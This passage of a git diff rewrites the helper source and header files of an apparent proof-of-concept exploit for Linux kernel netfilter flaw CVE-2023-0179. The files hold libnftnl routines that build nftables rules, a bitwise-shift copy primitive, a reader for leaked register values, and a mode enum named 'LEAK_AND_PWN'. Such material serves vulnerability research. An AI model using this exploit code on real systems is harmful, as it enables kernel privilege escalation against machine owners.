-            mnl_nlmsg_batch_current(batch),
-            msg_type, family,
-            msg_flags | NLM_F_ACK, (*seq)++
-        );
-    }
-    if (msg == NFT_MSG_NEWSET) {
-        nftnl_set_nlmsg_build_payload(nlh, *object);
-        nftnl_set_free(*object);
-    } else {
-        switch(nft_type) {
-            case NFT_TYPE_TABLE:
-                nftnl_table_nlmsg_build_payload(nlh, *object);
-                nftnl_table_free(*object);
-                break;
-            case NFT_TYPE_CHAIN:
-                nftnl_chain_nlmsg_build_payload(nlh, *object);
-                nftnl_chain_free(*object);
-                break;
-            case NFT_TYPE_RULE:
-                nftnl_rule_nlmsg_build_payload(nlh, *object);
-                // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2));
-                nftnl_rule_free(*object);
-                break;
-            default:
-                return -1;
-        }  
-    }
-
-    *object = NULL;
-
-    mnl_nlmsg_batch_next(batch);
-    nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++);
-    mnl_nlmsg_batch_next(batch);
-
-    int ret = mnl_socket_sendto(
-        nl,
-        mnl_nlmsg_batch_head(batch),
-        mnl_nlmsg_batch_size(batch)
-    );
-
-    if (ret < 0) {
-        perror("mnl_socket_send");
-        return -1;
-    }
-
-    int portid = mnl_socket_get_portid(nl);
-
-    mnl_nlmsg_batch_stop(batch);
-
-    result_handler(nl, portid, table_seq);
-}
-
-struct nftnl_table* build_table(char* name, uint16_t family)
-{
-    struct nftnl_table* t = nftnl_table_alloc();
-    
-    nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
-    nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
-
-    return t;
-}
-
-struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param)
-{
-    struct nftnl_chain* c;
-
-    c = nftnl_chain_alloc();
-
-    nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
-    nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
-    if (dev_name) 
-        nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name);
-
-    if (base_param) {
-        nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
-        nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
-    }
-
-    return c;
-}
-
-struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle)
-{
-    struct nftnl_rule* r = NULL;
-    uint8_t proto;
-    
-    r = nftnl_rule_alloc();
-
-    nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name);
-    nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name);
-    nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family);
-    
-    if (handle) {
-        nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle);
-    }
-
-    return r;
-}
-
-struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family)
-{
-    // Create a new set object
-    struct nftnl_set *set = nftnl_set_alloc();
-
-    nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name);
-    nftnl_set_set_str(set, NFTNL_SET_NAME, set_name);
-    nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP);
-    nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE);
-    nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4);
-    nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4);
-    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);
-    nftnl_set_set_u32(set, NFTNL_SET_ID, 1);
-
-    //nftnl_set_add_expr(set, expr);
-    return set;
-}
-
-#define NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1
-#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1
-
-void rule_add_bit_shift(
-    struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
-    uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len)
-{
-    
-    if(bitwise_len > 0xff) {
-        puts("bitwise_len > 0xff");
-        exit(EXIT_FAILURE);
-    }
-
-    struct nftnl_expr* e;
-    e = nftnl_expr_alloc("bitwise");
-
-    nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg);
-    nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg);
-    nftnl_expr_set_u32(e, NFTA_BITWISE_OP, shift_type);
-    nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len);
-    nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len);
-
-    nftnl_rule_add_expr(r, e);
-}
-
-void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg)
-{
-    uint32_t data = 0;
-    rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data));
-}
-
-void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data)
-{
-    struct nftnl_expr *expr = nftnl_expr_alloc("dynset");
-    nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name);
-    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE);
-    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1);
-    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key);
-    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data);
-    nftnl_rule_add_expr(r, expr);
-}
-
-void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data)
-{
-    struct nftnl_expr *expr = nftnl_expr_alloc("lookup");
-    nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name);
-    nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1);
-    nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key);
-    nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data);
-    nftnl_rule_add_expr(r, expr);
-}
-
-void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg)
-{
-    struct nftnl_expr* e;
-    e = nftnl_expr_alloc("payload");
-
-    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base);
-    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset);
-    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len);
-    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg);
-
-    nftnl_rule_add_expr(r, e);
-}
-
-void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len)
-{
-    struct nftnl_expr* e;
-    e = nftnl_expr_alloc("cmp");
-
-    nftnl_expr_set_u32(e, NFTA_CMP_OP, op);
-    nftnl_expr_set_u32(e, NFTA_CMP_SREG, sreg);
-    nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len);
-
-    nftnl_rule_add_expr(r, e);
-}
-
-void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len)
-{
-    struct nftnl_expr* e;
-    
-    e = nftnl_expr_alloc("immediate");
-
-    nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg);
-    nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len);
-
-    nftnl_rule_add_expr(r, e);
-}
-
-void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name)
-{
-    struct nftnl_expr* e;
-    e = nftnl_expr_alloc("immediate");
-
-    // dreg = 0 -> verdict
-    nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); 
-    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict);
-    if (verdict == NFT_GOTO || verdict == NFT_JUMP) {
-        nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name);
-    }
-
-    nftnl_rule_add_expr(r, e);
-}
-
-int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
-{
-    struct nftnl_table* t = build_table(name, family);
-
-    return send_batch_request(
-        nl,
-        NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8),
-        NLM_F_CREATE, family, (void**)&t, seq,
-        result_handler
-    );
-}
-
-int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
-{
-    struct nftnl_set* s = build_set(table_name, name, family);
-    
-    return send_batch_request(
-        nl,
-        NFT_MSG_NEWSET,
-        NLM_F_CREATE, family, (void**)&s, seq,
-        result_handler
-    );
-}
-
-int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
-{
-    struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param);
-
-    return send_batch_request(
-        nl,
-        NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8),
-        NLM_F_CREATE, family, (void**)&c, seq,
-        result_handler  
-    );
-}
-
-int send_packet() 
-{
-    int sockfd;
-    struct sockaddr_in addr;
-    char buffer[] = "This is a test message";
-    char *interface_name = "vlan.10";  // double-tagged packet
-    int interface_index;
-    struct ifreq ifr;
-    memset(&ifr, 0, sizeof(ifr));
-    memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name)));
-
-    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
-    if (sockfd < 0) {
-        perror("[-] Error creating socket");
-        return 1;
-    }
- 
-    // Set the SO_BINDTODEVICE socket option
-    if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) {
-        perror("[-] Error setting SO_BINDTODEVICE socket option");
-        return 1;
-    }
-
-    memset(&addr, 0, sizeof(addr));
-    addr.sin_family = AF_INET;
-    addr.sin_addr.s_addr = inet_addr("192.168.123.123");  // random destination
-    addr.sin_port = htons(1337); 
-    
-    // Send the UDP packet
-    if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
-        perror("[-] Error sending UDP packet");
-        return 1;
-    }
-
-    close(sockfd);
-    return 0;
+/*
+ * ----------------------------------------------------------------------------
+ * "THE BEER-WARE LICENSE" (Revision 42):
+ * David Bouman (pql) wrote this file.  As long as you retain this notice you
+ * can do whatever you want with this stuff. If we meet some day, and you think
+ * this stuff is worth it, you can buy me a beer in return.   Signed, David.
+ * ----------------------------------------------------------------------------
+ */
+
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <time.h>
+#include <string.h>
+#include <arpa/inet.h>
+#include <stdint.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nf_tables.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <libmnl/libmnl.h>
+#include <libnftnl/table.h>
+#include <libnftnl/chain.h>
+#include <libnftnl/rule.h>
+#include <libnftnl/set.h>
+#include <libnftnl/expr.h>
+#include <net/if.h>
+#include <linux/if_packet.h>
+#include <fcntl.h>
+#include <limits.h>
+
+#include "helpers.h"
+
+unsigned long read_from_file(int line) {
+    int fd;
+    char buf[20];
+    unsigned long result;
+    char *endptr;
+    
+    fd = open("reg.log", O_RDONLY);
+    if (fd == -1) {
+        perror("open");
+        exit(1);
+    }
+
+    if (read(fd, buf, sizeof(buf)) == -1) {
+        perror("read");
+        close(fd);
+        exit(1);
+    }
+
+    if (line == 1 && read(fd, buf, sizeof(buf)) == -1) {
+        perror("read");
+        close(fd);
+        exit(1);
+    }
+    
+    result = strtoul(buf, &endptr, 16);
+    if (result == ULONG_MAX && endptr == buf) {
+        fprintf(stderr, "strtoul: invalid argument\n");
+        close(fd);
+        exit(1);
+    }
+    close(fd);
+    return result;
+}
+
+static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq)
+{
+    char buf[MNL_SOCKET_BUFFER_SIZE];
+
+    int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
+
+    while (ret > 0) {
+        ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL);
+        if (ret <= 0) break;
+        ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
+    }
+    return ret;
+}
+
+int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
+{
+    char buf[MNL_SOCKET_BUFFER_SIZE];
+    struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf);
+    uint8_t msg_type = msg & 0xff;
+    uint8_t nft_type = (msg >> 8) & 0xff;
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++);
+    mnl_nlmsg_batch_next(batch);
+    int table_seq = *seq;
+    struct nlmsghdr* nlh;
+
+    if (result_handler == NULL) {
+        result_handler = default_batch_req_handler;
+    }
+
+    if (msg == NFT_MSG_NEWSET) {
+        nlh = nftnl_set_nlmsg_build_hdr(
+            mnl_nlmsg_batch_current(batch),
+            NFT_MSG_NEWSET, family,
+            msg_flags | NLM_F_ACK, (*seq)++);
+    } else {
+        nlh = nftnl_nlmsg_build_hdr(
+            mnl_nlmsg_batch_current(batch),
+            msg_type, family,
+            msg_flags | NLM_F_ACK, (*seq)++
+        );
+    }
+    if (msg == NFT_MSG_NEWSET) {
+        nftnl_set_nlmsg_build_payload(nlh, *object);
+        nftnl_set_free(*object);
+    } else {
+        switch(nft_type) {
+            case NFT_TYPE_TABLE:
+                nftnl_table_nlmsg_build_payload(nlh, *object);
+                nftnl_table_free(*object);
+                break;
+            case NFT_TYPE_CHAIN:
+                nftnl_chain_nlmsg_build_payload(nlh, *object);
+                nftnl_chain_free(*object);
+                break;
+            case NFT_TYPE_RULE:
+                nftnl_rule_nlmsg_build_payload(nlh, *object);
+                // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2));
+                nftnl_rule_free(*object);
+                break;
+            default:
+                return -1;
+        }  
+    }
+
+    *object = NULL;
+
+    mnl_nlmsg_batch_next(batch);
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++);
+    mnl_nlmsg_batch_next(batch);
+
+    int ret = mnl_socket_sendto(
+        nl,
+        mnl_nlmsg_batch_head(batch),
+        mnl_nlmsg_batch_size(batch)
+    );
+
+    if (ret < 0) {
+        perror("mnl_socket_send");
+        return -1;
+    }
+
+    int portid = mnl_socket_get_portid(nl);
+
+    mnl_nlmsg_batch_stop(batch);
+
+    result_handler(nl, portid, table_seq);
+}
+
+struct nftnl_table* build_table(char* name, uint16_t family)
+{
+    struct nftnl_table* t = nftnl_table_alloc();
+    
+    nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
+    nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
+
+    return t;
+}
+
+struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param)
+{
+    struct nftnl_chain* c;
+
+    c = nftnl_chain_alloc();
+
+    nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
+    nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
+    if (dev_name) 
+        nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name);
+
+    if (base_param) {
+        nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
+        nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
+    }
+
+    return c;
+}
+
+struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle)
+{
+    struct nftnl_rule* r = NULL;
+    uint8_t proto;
+    
+    r = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name);
+    nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name);
+    nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family);
+    
+    if (handle) {
+        nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle);
+    }
+
+    return r;
+}
+
+struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family)
+{
+    // Create a new set object
+    struct nftnl_set *set = nftnl_set_alloc();
+
+    nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name);
+    nftnl_set_set_str(set, NFTNL_SET_NAME, set_name);
+    nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP);
+    nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE);
+    nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4);
+    nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4);
+    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);
+    nftnl_set_set_u32(set, NFTNL_SET_ID, 1);
+
+    //nftnl_set_add_expr(set, expr);
+    return set;
+}
+
+#define NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1
+#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1
+
+void rule_add_bit_shift(
+    struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
+    uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len)
+{
+    
+    if(bitwise_len > 0xff) {
+        puts("bitwise_len > 0xff");
+        exit(EXIT_FAILURE);
+    }
+
+    struct nftnl_expr* e;
+    e = nftnl_expr_alloc("bitwise");
+
+    nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg);
+    nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg);
+    nftnl_expr_set_u32(e, NFTA_BITWISE_OP, shift_type);
+    nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len);
+    nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len);
+
+    nftnl_rule_add_expr(r, e);
+}
+
+void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg)
+{
+    uint32_t data = 0;
+    rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data));
+}
+
+void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data)
+{
+    struct nftnl_expr *expr = nftnl_expr_alloc("dynset");
+    nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name);
+    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE);
+    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1);
+    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key);
+    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data);
+    nftnl_rule_add_expr(r, expr);
+}
+
+void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data)
+{
+    struct nftnl_expr *expr = nftnl_expr_alloc("lookup");
+    nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name);
+    nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1);
+    nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key);
+    nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data);
+    nftnl_rule_add_expr(r, expr);
+}
+
+void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg)
+{
+    struct nftnl_expr* e;
+    e = nftnl_expr_alloc("payload");
+
+    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base);
+    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset);
+    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len);
+    nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg);
+
+    nftnl_rule_add_expr(r, e);
+}
+
+void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len)
+{
+    struct nftnl_expr* e;
+    e = nftnl_expr_alloc("cmp");
+
+    nftnl_expr_set_u32(e, NFTA_CMP_OP, op);
+    nftnl_expr_set_u32(e, NFTA_CMP_SREG, sreg);
+    nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len);
+
+    nftnl_rule_add_expr(r, e);
+}
+
+void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len)
+{
+    struct nftnl_expr* e;
+    
+    e = nftnl_expr_alloc("immediate");
+
+    nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg);
+    nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len);
+
+    nftnl_rule_add_expr(r, e);
+}
+
+void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name)
+{
+    struct nftnl_expr* e;
+    e = nftnl_expr_alloc("immediate");
+
+    // dreg = 0 -> verdict
+    nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); 
+    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict);
+    if (verdict == NFT_GOTO || verdict == NFT_JUMP) {
+        nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name);
+    }
+
+    nftnl_rule_add_expr(r, e);
+}
+
+int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
+{
+    struct nftnl_table* t = build_table(name, family);
+
+    return send_batch_request(
+        nl,
+        NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8),
+        NLM_F_CREATE, family, (void**)&t, seq,
+        result_handler
+    );
+}
+
+int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
+{
+    struct nftnl_set* s = build_set(table_name, name, family);
+    
+    return send_batch_request(
+        nl,
+        NFT_MSG_NEWSET,
+        NLM_F_CREATE, family, (void**)&s, seq,
+        result_handler
+    );
+}
+
+int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
+{
+    struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param);
+
+    return send_batch_request(
+        nl,
+        NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8),
+        NLM_F_CREATE, family, (void**)&c, seq,
+        result_handler  
+    );
+}
+
+int send_packet() 
+{
+    int sockfd;
+    struct sockaddr_in addr;
+    char buffer[] = "This is a test message";
+    char *interface_name = "vlan.10";  // double-tagged packet
+    int interface_index;
+    struct ifreq ifr;
+    memset(&ifr, 0, sizeof(ifr));
+    memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name)));
+
+    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+    if (sockfd < 0) {
+        perror("[-] Error creating socket");
+        return 1;
+    }
+ 
+    // Set the SO_BINDTODEVICE socket option
+    if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) {
+        perror("[-] Error setting SO_BINDTODEVICE socket option");
+        return 1;
+    }
+
+    memset(&addr, 0, sizeof(addr));
+    addr.sin_family = AF_INET;
+    addr.sin_addr.s_addr = inet_addr("192.168.123.123");  // random destination
+    addr.sin_port = htons(1337); 
+    
+    // Send the UDP packet
+    if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
+        perror("[-] Error sending UDP packet");
+        return 1;
+    }
+
+    close(sockfd);
+    return 0;
 }
\ No newline at end of file
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h
index f62b1c1d..54ad08de 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h
+++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h
@@ -1,60 +1,60 @@
-/*
- * ----------------------------------------------------------------------------
- * "THE BEER-WARE LICENSE" (Revision 42):
- * David Bouman (pql) wrote this file.  As long as you retain this notice you
- * can do whatever you want with this stuff. If we meet some day, and you think
- * this stuff is worth it, you can buy me a beer in return.   Signed, David.
- * ----------------------------------------------------------------------------
- */
-
-#pragma once
-#include <stdint.h>
-#define MIN(a, b) ((a) < (b) ? (a) : (b))
-#define VLAN_HLEN	    4
-#define VLAN_ETH_HLEN   18
-
-enum nft_types {
-    NFT_TYPE_TABLE = 0,
-    NFT_TYPE_CHAIN,
-    NFT_TYPE_RULE,
-    NFT_TYPE_SET
-};
-
-enum mode {
-    LEAK_ONLY = 1,
-    LEAK_AND_PWN
-};
-
-struct unft_base_chain_param {
-    uint32_t hook_num;
-    uint32_t prio;
-};
-
-// build helpers
-struct nftnl_table* build_table(char* name, uint16_t family);
-struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param);
-struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle);
-struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family);
-
-// create helpers (actually commits to the kernel)
-int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int));
-
-int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-
-// expression helpers
-void rule_add_bit_shift(
-    struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
-    uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len);
-void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg);
-void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);
-void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len);
-void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len);
-void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
-void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
-void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len);
-void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name);
-
-int send_packet();
+/*
+ * ----------------------------------------------------------------------------
+ * "THE BEER-WARE LICENSE" (Revision 42):
+ * David Bouman (pql) wrote this file.  As long as you retain this notice you
+ * can do whatever you want with this stuff. If we meet some day, and you think
+ * this stuff is worth it, you can buy me a beer in return.   Signed, David.
+ * ----------------------------------------------------------------------------
+ */
+
+#pragma once
+#include <stdint.h>
+#define MIN(a, b) ((a) < (b) ? (a) : (b))
+#define VLAN_HLEN	    4
+#define VLAN_ETH_HLEN   18
+
+enum nft_types {
+    NFT_TYPE_TABLE = 0,
+    NFT_TYPE_CHAIN,
+    NFT_TYPE_RULE,
+    NFT_TYPE_SET
+};
+
+enum mode {
+    LEAK_ONLY = 1,
+    LEAK_AND_PWN
+};
+
+struct unft_base_chain_param {
+    uint32_t hook_num;
+    uint32_t prio;
+};
+
+// build helpers
+struct nftnl_table* build_table(char* name, uint16_t family);
+struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param);
+struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle);
+struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family);
+
+// create helpers (actually commits to the kernel)
+int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int));
+
+int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+
+// expression helpers
+void rule_add_bit_shift(
+    struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
+    uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len);
+void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg);
+void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);
+void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len);
+void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len);
